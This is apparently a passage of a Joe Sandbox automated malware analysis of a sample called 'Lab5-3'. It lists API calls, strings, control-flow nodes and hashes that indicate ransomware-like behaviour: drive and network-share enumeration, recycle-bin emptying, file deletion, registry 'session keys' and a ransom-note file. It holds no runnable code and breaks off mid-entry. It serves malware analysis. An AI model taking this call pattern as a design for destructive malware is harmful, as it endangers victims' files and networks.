                                                                                                            • Source File: 00000013.00000002.1822389450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.1822008276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822737121.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822809550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_Lab5-3.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Gdip$Delete$FormatString$BrushCreateImageSystem$AlignFileFromGraphicsLineMetricsTempValuewsprintf$BitmapCloseContextDisposeFillFontGdiplusInfoNameOpenParametersPathRectRectangleSaveScan0Startupfreemalloc
                                                                                                            • String ID: 0$0$2$bPfk$bu$c$image/bmp$kwfw
                                                                                                            • API String ID: 1057032377-1992152674
                                                                                                            • Opcode ID: eb854612df39bcaa66371bfd8bb11581b24179fd73befcad49a4cf2ddf848974
                                                                                                            • Instruction ID: a62de033df0d0d70a3a5c523e934d968c5c1b1d89fe7917a69ea983d0474aa7d
                                                                                                            • Opcode Fuzzy Hash: eb854612df39bcaa66371bfd8bb11581b24179fd73befcad49a4cf2ddf848974
                                                                                                            • Instruction Fuzzy Hash: 62E15C715083859FD321DF60C944BEBBBE8EF89304F004A6EF68596261E7749588CB9A
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • RtlEnterCriticalSection.NTDLL(00426930), ref: 0041018B
                                                                                                            • lstrcmpiW.KERNEL32(0041A125), ref: 004101AC
                                                                                                            • wsprintfW.USER32 ref: 004102AE
                                                                                                            • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000), ref: 004102CB
                                                                                                            • RtlLeaveCriticalSection.NTDLL ref: 004102E2
                                                                                                            • ExitThread.KERNEL32 ref: 004102EA
                                                                                                            • FindClose.KERNEL32(00000000), ref: 004102F1
                                                                                                            • wsprintfW.USER32 ref: 00410393
                                                                                                            • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000001,04000100,00000000), ref: 004103B2
                                                                                                            • RtlLeaveCriticalSection.NTDLL ref: 004103D8
                                                                                                            • ExitThread.KERNEL32 ref: 004103E0
                                                                                                            • malloc.MSVCRT ref: 004103EB
                                                                                                            • RtlLeaveCriticalSection.NTDLL ref: 00410452
                                                                                                            • SHEmptyRecycleBinW.SHELL32(00000000,0041A125,00000007), ref: 0041045D
                                                                                                            • GetDiskFreeSpaceExW.KERNEL32(0041A125,?,?,?), ref: 00410473
                                                                                                            • SetThreadUILanguage.KERNEL32(00000409), ref: 00410482
                                                                                                            • StrFormatByteSize64A.SHLWAPI(?,?,?,00000064), ref: 004104A0
                                                                                                            • StrFormatByteSize64A.SHLWAPI(?,?,?,00000064), ref: 004104B1
                                                                                                            • wsprintfA.USER32 ref: 004104DF
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00410500
                                                                                                            • DeleteFileW.KERNEL32(?), ref: 0041050E
                                                                                                            • ExitThread.KERNEL32 ref: 0041051D
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.1822389450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.1822008276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822737121.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822809550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_Lab5-3.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CriticalSectionThread$ExitFileLeavewsprintf$ByteCloseFindFormatSize64$CreateDeleteDiskEmptyEnterFirstFreeHandleLanguageRecycleSpacelstrcmpimalloc
                                                                                                            • String ID: #$%S %s total / %s free$%s\%S$0$C$P
                                                                                                            • API String ID: 1890646748-3489668308
                                                                                                            • Opcode ID: aa3a259fb410497d51953975968b6f333b55108f70cb2d47533e3aa50358acbb
                                                                                                            • Instruction ID: 90bbdc170fa110a38be7d5348af0c7c2766d943f18c39cc720d78da77a98dcfd
                                                                                                            • Opcode Fuzzy Hash: aa3a259fb410497d51953975968b6f333b55108f70cb2d47533e3aa50358acbb
                                                                                                            • Instruction Fuzzy Hash: F7A1BD71518380ABC3209FA0DC44BAFBBF8EF89704F41592EF194D71A1E7789549CB9A
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • RtlInitializeCriticalSection.NTDLL ref: 0040FE8E
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,0041A450,00000000,00000000,?), ref: 0040FEAB
                                                                                                            • NtSetInformationThread.NTDLL ref: 0040FEC1
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,0040FAB0,00000000,00000000,?), ref: 0040FEE7
                                                                                                            • NtSetInformationThread.NTDLL ref: 0040FEF7
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,0040FA70,00000000,00000000,004171D8), ref: 0040FF1D
                                                                                                            • NtSetInformationThread.NTDLL ref: 0040FF2D
                                                                                                            • GetLogicalDrives.KERNEL32 ref: 0040FF42
                                                                                                            • GetDriveTypeW.KERNEL32(?), ref: 0040FF73
                                                                                                            • malloc.MSVCRT ref: 0040FF8E
                                                                                                            • wsprintfW.USER32 ref: 0041003F
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,t,00000000,00000000,?), ref: 00410058
                                                                                                            • NtSetInformationThread.NTDLL ref: 0041006C
                                                                                                            • Sleep.KERNEL32(00003A98), ref: 0041009D
                                                                                                            • WaitForMultipleObjects.KERNEL32(?,00426960,00000000,000000FF), ref: 004100AE
                                                                                                            • Sleep.KERNEL32(00000064), ref: 004100F2
                                                                                                            • RtlDeleteCriticalSection.NTDLL(00426930), ref: 0041010B
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.1822389450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.1822008276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822737121.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822809550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_Lab5-3.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Thread$CreateInformation$CriticalSectionSleep$DeleteDriveDrivesInitializeLogicalMultipleObjectsTypeWaitmallocwsprintf
                                                                                                            • String ID: 333$o$t$threads closed, waiting handles...
                                                                                                            • API String ID: 1587691042-3484717054
                                                                                                            • Opcode ID: d5731ff876623b3e496eb7acb6af2c14848622414735af2600f36727be769912
                                                                                                            • Instruction ID: bcec9fa377175a6d017f7fa74f539e6352aa7a71377bc0164c3aa970f20bdfce
                                                                                                            • Opcode Fuzzy Hash: d5731ff876623b3e496eb7acb6af2c14848622414735af2600f36727be769912
                                                                                                            • Instruction Fuzzy Hash: EB81F474E40388ABDB209BA8EC45BDE7BB0AF0E710F554136F950B72E1D77414868B6D
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 489 417880-417896 490 417898-4178d4 GetModuleHandleA 489->490 491 4178da-41794e call 401e40 GetProcAddress 489->491 490->491 494 417950-417961 491->494 494->494 495 417963-41797b GetProcAddress 494->495 496 417981-417983 495->496 497 417f05-417f16 495->497 496->497 498 417989-41799b 496->498 500 4179a1-417a9c GetProcAddress * 2 498->500 501 417ef6-417f04 498->501 502 417aa2-417aa4 500->502 503 417ee7 500->503 502->503 505 417aaa-417acb 502->505 504 417eec-417ef2 503->504 504->501 505->504 507 417ad1-417aee 505->507 508 417af5-417b00 507->508 508->508 509 417b02-417b1a GetProcAddress 508->509 510 417b43-417b62 call 407e2d 509->510 511 417b1c-417b42 509->511 515 417b67-417b69 510->515 517 417b6b-417b7b call 407e2d 515->517 518 417b7e-417b9c 515->518 517->518 522 417ba2-417ba5 518->522 523 417ea6 518->523 522->523 524 417bab-417bfd call 402150 GetProcAddress 522->524 525 417ea9-417eb5 523->525 524->523 530 417c03-417d1b 524->530 527 417b64 525->527 528 417ebb-417ee6 525->528 527->515 532 417d20-417d34 malloc 530->532 534 417ea3 532->534 535 417d3a-417d50 532->535 534->523 537 417e75-417e85 free 535->537 538 417d56-417d5d 535->538 539 417e92-417e95 537->539 540 417e87-417e8d 537->540 541 417d60-417d69 538->541 539->534 542 417e97-417ea1 539->542 540->532 543 417d70-417d7e 541->543 542->525 544 417e50-417e56 543->544 545 417d84-417d8d 543->545 544->543 546 417e5c-417e63 544->546 547 417d8f-417d92 545->547 548 417d9e-417dae CharLowerBuffW 545->548 546->541 550 417e69-417e6f 546->550 547->548 551 417d94-417d9c 547->551 549 417db1-417db4 548->549 552 417dd3 549->552 553 417db6-417dbc 549->553 550->537 551->548 551->551 556 417dd5-417ddc 552->556 554 417dc0-417dd1 call 4041e0 553->554 555 417dbe 553->555 554->556 555->554 558 417e47-417e4d 556->558 559 417dde-417de5 556->559 558->544 559->549 561 417de7-417e0f 559->561 562 417e10-417e1b 561->562 562->562 563 417e1d-417e45 call 40f630 call 416710 562->563 563->525
                                                                                                            APIs
                                                                                                            • GetModuleHandleA.KERNEL32(?,00000000,00000000,?), ref: 004178CC
                                                                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 0041790E
                                                                                                            • GetProcAddress.KERNEL32(?), ref: 00417977
                                                                                                            • GetProcAddress.KERNEL32(?), ref: 00417A40
                                                                                                            • GetProcAddress.KERNEL32(?), ref: 00417A92
                                                                                                            • GetProcAddress.KERNEL32(?), ref: 00417B10
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 00417BE8
                                                                                                            • malloc.MSVCRT ref: 00417D21
                                                                                                            • CharLowerBuffW.USER32(?,00000000), ref: 00417DA0
                                                                                                            • free.MSVCRT(00000000), ref: 00417E76
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.1822389450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.1822008276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822737121.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822809550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_Lab5-3.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AddressProc$BuffCharHandleLowerModulefreemalloc
                                                                                                            • String ID: !$3$H$Y/\'$[]FA$_$a}Fa$nhiA$nkb$ta`f
                                                                                                            • API String ID: 4159484036-3596407591
                                                                                                            • Opcode ID: 4a40a6afe4c9c7fa74a07490c07d7d949dce329068ac1f22c97717c5993dabed
                                                                                                            • Instruction ID: aa8b998ef8105a80910c3bc4ad82b1a3a6713d45934d4583ce3d58dbc10d0851
                                                                                                            • Opcode Fuzzy Hash: 4a40a6afe4c9c7fa74a07490c07d7d949dce329068ac1f22c97717c5993dabed
                                                                                                            • Instruction Fuzzy Hash: AA128970E082699FDB21CFA8D8847EEBBB4AF19304F0440EAD548B7311DB745A85CFA5
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 568 418620-41864f malloc 569 418651-41865e 568->569 570 418664-41866f 569->570 570->570 571 418671-41869b RegCreateKeyExA 570->571 572 4186a1-418753 RegQueryValueExA * 2 571->572 573 418873-41888e 571->573 574 418755-418757 572->574 575 418759-41875d 572->575 576 418890-41889b 573->576 574->575 577 418778-4187a4 call 404090 call 4023c0 call 40f630 RegCloseKey 574->577 578 4187a9-4187b3 call 418e60 575->578 579 41875f-418761 575->579 576->576 580 41889d-4188b7 call 40f630 call 418e60 576->580 601 4188d9-41891f call 40b4e0 * 2 call 40d7d0 call 40c0e0 577->601 590 4187b9-4187cf call 418c90 578->590 591 418c78-418c82 578->591 579->578 581 418763-418773 Sleep 579->581 580->591 597 4188bd-4188d3 call 418c90 580->597 581->569 590->591 598 4187d5-418871 RegSetValueExA * 2 RegCloseKey 590->598 597->591 597->601 598->601 601->591 611 418925-41893f call 40c0e0 601->611 611->591 614 418945-418968 call 40d720 611->614 614->591 617 41896e-4189da call 4086f0 call 408390 call 4042a0 call 404210 call 404df0 call 404250 call 4053e0 614->617 632 4189e0-4189eb 617->632 632->632 633 4189ed-418a7d call 412570 * 3 malloc call 4124f0 call 412570 call 4124d0 CryptBinaryToStringA 632->633 633->591 646 418a83-418a87 633->646 647 418a90-418a98 646->647 648 418aab-418aad 647->648 649 418a9a 647->649 651 418ac9-418b1a CharUpperA CryptBinaryToStringA 648->651 652 418aaf-418ab8 648->652 650 418aa0-418aa9 649->650 650->648 650->650 651->591 653 418b20-418b22 651->653 654 418ac6-418ac7 652->654 655 418aba-418abc 652->655 657 418b24-418b2c 653->657 654->647 655->654 656 418abe-418ac5 655->656 656->654 658 418b3b-418b3d 657->658 659 418b2e 657->659 661 418b59-418b8d CharUpperA 658->661 662 418b3f-418b48 658->662 660 418b30-418b39 659->660 660->658 660->660 665 418b9a-418bac call 4124d0 661->665 666 418b8f-418b91 661->666 663 418b56-418b57 662->663 664 418b4a-418b4c 662->664 663->657 664->663 668 418b4e-418b55 664->668 671 418bb9-418bc3 665->671 672 418bae-418bb0 665->672 666->665 669 418b93-418b98 666->669 668->663 669->665 669->669 674 418bc5-418bcd 671->674 675 418bcf-418bf2 call 4124d0 671->675 672->671 673 418bb2-418bb7 672->673 673->671 673->673 674->674 674->675 678 418bf4-418bfb 675->678 679 418bfd-418c01 675->679 678->678 678->679 680 418c03-418c0b 679->680 681 418c0d-418c18 679->681 680->680 680->681 682 418c1a-418c1c 681->682 683 418c1e-418c22 681->683 684 418c2b-418c44 call 4124d0 682->684 683->684 685 418c24-418c29 683->685 688 418c57-418c77 free 684->688 689 418c46-418c48 684->689 685->684 685->685 689->688 690 418c4a 689->690 691 418c50-418c55 690->691 691->688 691->691
                                                                                                            APIs
                                                                                                            • malloc.MSVCRT ref: 00418643
                                                                                                            • RegCreateKeyExA.ADVAPI32(80000001,?,00000000,00000000,00000000,000F003F,00000000,?,?), ref: 00418693
                                                                                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,00000003,00427AA0,00000500), ref: 004186EE
                                                                                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,00000003,?,00000103), ref: 0041874B
                                                                                                            • Sleep.KERNEL32(00002710), ref: 00418768
                                                                                                            • RegCloseKey.ADVAPI32(?,?), ref: 0041879E
                                                                                                              • Part of subcall function 0040C0E0: free.MSVCRT(?,?,?,?,?,?,?,?,00418CDD,?,00426000,00000100,00428330,00000000,00000000,?), ref: 0040C12A
                                                                                                              • Part of subcall function 0040C0E0: calloc.MSVCRT ref: 0040C161
                                                                                                              • Part of subcall function 0040C0E0: free.MSVCRT(00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040C196
                                                                                                            • malloc.MSVCRT ref: 00418A20
                                                                                                            • CryptBinaryToStringA.CRYPT32(00426000,00000008,00000004,?,00000032), ref: 00418A75
                                                                                                            • CharUpperA.USER32(?), ref: 00418AD8
                                                                                                            • CryptBinaryToStringA.CRYPT32(?,00000008,00000004,00000000,00000032), ref: 00418B12
                                                                                                            • CharUpperA.USER32(00000000), ref: 00418B68
                                                                                                            • free.MSVCRT(?), ref: 00418C61
                                                                                                            Strings
                                                                                                            • Getting session keys from registry, xrefs: 0041877E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.1822389450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.1822008276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822737121.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822809550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_Lab5-3.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: free$BinaryCharCryptQueryStringUpperValuemalloc$CloseCreateSleepcalloc
                                                                                                            • String ID: Getting session keys from registry
                                                                                                            • API String ID: 2471977085-551079499
                                                                                                            • Opcode ID: d0e9acbdaa74053af64decda54c093bc5b277a89053def69ea4c410c6dbd5fd2
                                                                                                            • Instruction ID: 7585cef803c0380c97e087a7ca3b433ba73a29e6307f047849749a887aafa14a
                                                                                                            • Opcode Fuzzy Hash: d0e9acbdaa74053af64decda54c093bc5b277a89053def69ea4c410c6dbd5fd2
                                                                                                            • Instruction Fuzzy Hash: 85123C70D04249AFDF11DBB49C05BEFBBB4AF15304F1440AEE944B7282EB785A85C7A9
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 692 419d30-419d6a call 4124f0 695 419d7a-419e89 call 4124d0 wsprintfA GetModuleHandleA GetProcAddress 692->695 696 419d6c 692->696 700 419e90-419e98 695->700 697 419d70-419d78 696->697 697->695 697->697 701 419e9a-419e9d 700->701 702 419e9f-419eb4 GetModuleHandleA GetProcAddress 700->702 701->700 703 419f43-419f4e 702->703 704 419eba-419ebc 702->704 705 419f50-41a061 wsprintfW WNetAddConnection2W 703->705 704->703 706 419ec2-419ed1 704->706 707 41a067-41a08c NetShareEnum 705->707 706->703 714 419ed3-419ee1 706->714 708 41a096-41a0a5 707->708 709 41a08e-41a094 707->709 712 41a0b5-41a0be NetApiBufferFree 708->712 713 41a0a7-41a0ab 708->713 709->708 711 41a0c0-41a0c3 709->711 717 41a0c5-41a0c9 711->717 718 41a0df-41a0ea 711->718 712->707 712->711 715 41a0eb-41a125 call 406bb0 call 401ce0 call 410170 713->715 716 41a0ad-41a0b3 713->716 714->703 722 419ee3-419f40 call 4124f0 call 401320 714->722 716->712 716->713 717->718 720 41a0cb-41a0d9 call 417790 717->720 720->705 720->718 722->703
                                                                                                            APIs
                                                                                                            • wsprintfA.USER32 ref: 00419DB6
                                                                                                            • GetModuleHandleA.KERNEL32(?,?), ref: 00419E59
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 00419E62
                                                                                                            • GetModuleHandleA.KERNEL32(?,?), ref: 00419EAB
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 00419EAE
                                                                                                            • wsprintfW.USER32 ref: 0041A030
                                                                                                            • WNetAddConnection2W.MPR(?,00000000,00000000,00000000), ref: 0041A061
                                                                                                            • NetShareEnum.NETAPI32(?,00000001,?,000000FF,00000000,00000000,00000000), ref: 0041A082
                                                                                                            • NetApiBufferFree.NETAPI32(?), ref: 0041A0B6
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.1822389450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.1822008276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822737121.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822809550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_Lab5-3.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AddressHandleModuleProcwsprintf$BufferConnection2EnumFreeShare
                                                                                                            • String ID: /HJ[G@\[MVNKK]$<$F$\\%S$\\%s\%s$`$u
                                                                                                            • API String ID: 921673412-799303916
                                                                                                            • Opcode ID: 1ed25e699270d519004c392db50bad2a4c396e3cda2ff3c63aedddcb8af98cbd
                                                                                                            • Instruction ID: 4add9407db59f9f686012b2b8cf93936b16fee97a91e8b4f02aa7f1e62e00a42
                                                                                                            • Opcode Fuzzy Hash: 1ed25e699270d519004c392db50bad2a4c396e3cda2ff3c63aedddcb8af98cbd
                                                                                                            • Instruction Fuzzy Hash: 03C19E35C04288AECF11DFB4C854BDFBBF8AF1A304F04509AE454BB241D7795A4ACBA9
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • NtRemoveIoCompletion.NTDLL ref: 004180DB
                                                                                                            • WriteFile.KERNEL32(?,?,?,00000000,?,?,?), ref: 00418233
                                                                                                            • RtlDosPathNameToNtPathName_U.NTDLL(?,?,00000000,00000000), ref: 0041825B
                                                                                                            • malloc.MSVCRT ref: 00418276
                                                                                                            • NtSetInformationFile.NTDLL ref: 004182D6
                                                                                                            • free.MSVCRT(?), ref: 004182E1
                                                                                                            • NtClose.NTDLL ref: 00418300
                                                                                                            • GlobalFree.KERNEL32(?), ref: 0041830E
                                                                                                            • GlobalFree.KERNEL32(?), ref: 00418314
                                                                                                            • __allrem.LIBCMT ref: 0041836C
                                                                                                            • NtClose.NTDLL ref: 004183E9
                                                                                                            • GlobalFree.KERNEL32(?), ref: 004183F0
                                                                                                            • GlobalFree.KERNEL32(?), ref: 004183F6
                                                                                                            • WriteFile.KERNEL32(?,?,-00000604,00000000,?,?,?,00000010,00000000), ref: 00418413
                                                                                                            • ReadFile.KERNEL32(?,?,00040000,00000000,?), ref: 0041849C
                                                                                                            • NtClose.NTDLL ref: 004184C5
                                                                                                            • GlobalFree.KERNEL32(?), ref: 004184CC
                                                                                                            • GlobalFree.KERNEL32(?), ref: 004184D2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.1822389450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.1822008276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822737121.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822809550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_Lab5-3.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: FreeGlobal$File$Close$PathWrite$CompletionInformationNameName_ReadRemove__allremfreemalloc
                                                                                                            • String ID:
                                                                                                            • API String ID: 2690872533-0
                                                                                                            • Opcode ID: 9103e2fdea9c80fd3ea67e8a9c5aac031cd181c19941d9ccf034fec14dfc5935
                                                                                                            • Instruction ID: ff6bbac03503fa4092cbb3a6534176c0db88dab075db292aedbac87244c7d2f3
                                                                                                            • Opcode Fuzzy Hash: 9103e2fdea9c80fd3ea67e8a9c5aac031cd181c19941d9ccf034fec14dfc5935
                                                                                                            • Instruction Fuzzy Hash: 24C1AE71504B00DFD720CF25CD44B9BB7E4FF58308F044A2EE99682651EB79E589CB8A
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • PathRemoveFileSpecW.SHLWAPI(?,?,00000000,00000000), ref: 00417F57
                                                                                                            • wsprintfW.USER32 ref: 00417FBB
                                                                                                            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,50000000,00000000), ref: 00417FDD
                                                                                                            • NtSetInformationFile.NTDLL ref: 00417FFF
                                                                                                            • NtClose.NTDLL ref: 0041800A
                                                                                                            • MessageBoxA.USER32(00000000,Unable to bind NOTE file IOCP %S error: %d,00000000,00000000), ref: 0041801B
                                                                                                            • GlobalAlloc.KERNEL32(00000040,00040068), ref: 00418030
                                                                                                            • WriteFile.KERNEL32(00000000,00000000,00000000), ref: 00418078
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00418090
                                                                                                            • NtClose.NTDLL ref: 00418097
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.1822389450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.1822008276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822737121.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822809550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_Lab5-3.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: File$CloseGlobal$AllocCreateFreeInformationMessagePathRemoveSpecWritewsprintf
                                                                                                            • String ID: 6k1$%$%$=1$Unable to bind NOTE file IOCP %S error: %d
                                                                                                            • API String ID: 3428260386-824455736
                                                                                                            • Opcode ID: aec04dac269132711e76bc3ebeb3a0c19038969bdaf2e91d06ca968d22087c12
                                                                                                            • Instruction ID: 3c7789fa63ceab8152487090d97d3f98e68c547c7fcc7fbb425659e4c08859d8
                                                                                                            • Opcode Fuzzy Hash: aec04dac269132711e76bc3ebeb3a0c19038969bdaf2e91d06ca968d22087c12
                                                                                                            • Instruction Fuzzy Hash: DB41BC31A40308ABD7318F64DC0DBDF7BF8EF49715F0046AAF919A6290DBB455448B98
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.1822389450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.1822008276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822737121.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822809550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_Lab5-3.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: malloc$AdaptersInfofreelstrcmpi$EntryExtensionInterlockedListPathPushRemovewsprintf
                                                                                                            • String ID: H$RLSN
                                                                                                            • API String ID: 42105023-2130604523
                                                                                                            • Opcode ID: 394fce62a7024194c19be9bd02397b5f632a5dc05cc49ddf23b7061232793069
                                                                                                            • Instruction ID: 20fe545423849105366122e2e05bbda7ad3782775de12c147ce060741212aa96
                                                                                                            • Opcode Fuzzy Hash: 394fce62a7024194c19be9bd02397b5f632a5dc05cc49ddf23b7061232793069
                                                                                                            • Instruction Fuzzy Hash: 2A51C371C05249DFDB01CBA8D848AEFBBB4AF29314F0841AAD844B7312DB355659CBE6
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • malloc.MSVCRT ref: 00417310
                                                                                                            • GetVolumePathNamesForVolumeNameW.KERNEL32(?,00000000,00000209,00000209), ref: 00417329
                                                                                                            • free.MSVCRT(00000000), ref: 00417341
                                                                                                            • malloc.MSVCRT ref: 0041734D
                                                                                                            • GetDriveTypeW.KERNEL32(?), ref: 00417360
                                                                                                            • wsprintfW.USER32 ref: 004173AB
                                                                                                            • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 004173CD
                                                                                                            • NtClose.NTDLL ref: 004173E2
                                                                                                            • free.MSVCRT(00000000), ref: 004173ED
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.1822389450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.1822008276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822737121.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822809550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_Lab5-3.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Volumefreemalloc$CloseCreateDriveFileNameNamesPathTypewsprintf
                                                                                                            • String ID: %$\$g$o$t
                                                                                                            • API String ID: 3867046599-3394384039
                                                                                                            • Opcode ID: 9a1f285a984335b2c3b5d4fbb688acc05a71f72ae61a00471cef763623505b72
                                                                                                            • Instruction ID: 1cbdf9fff812283147c1604227288cfda76624560ae53b9ca2b6288d26c4fd58
